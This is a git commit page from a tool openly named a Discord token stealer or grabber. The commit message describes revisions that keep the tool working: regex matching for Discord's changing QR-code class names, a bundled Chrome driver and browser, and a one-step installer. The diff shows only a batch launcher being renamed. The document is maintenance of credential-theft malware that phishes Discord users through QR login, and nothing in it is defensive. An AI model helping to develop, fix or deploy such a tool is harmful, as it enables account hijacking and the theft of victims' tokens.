Revision by the-cult-of-integral

One prevalent issue was that discord regular changes class names for the QR code, thus breaking the program. This issue has been fixed using regular expressions. Another issue was that people were having trouble with chromedriver and chrome binaries. Therefore, in this revision, a compatible chrome driver and chrome binary are included within the program (84.0.4147.85). Also simplified dependencies; now you just have to run that installation bat.
This commit is contained in:
Catterall
2022-04-22 12:01:52 +01:00
parent d88b815d13
commit fd5582f729
15 changed files with 154 additions and 135 deletions

View File

@ -1,4 +1,4 @@
@echo off
title [313] Token QR Stealer [Made by NightFall and Revised By Luci]
python qr_generator.py
pause
title QR Discord Token Grabber [Developed by NightFall, Revised By Luci and the-cult-of-integral]
python QR-dtg.py
title Terminal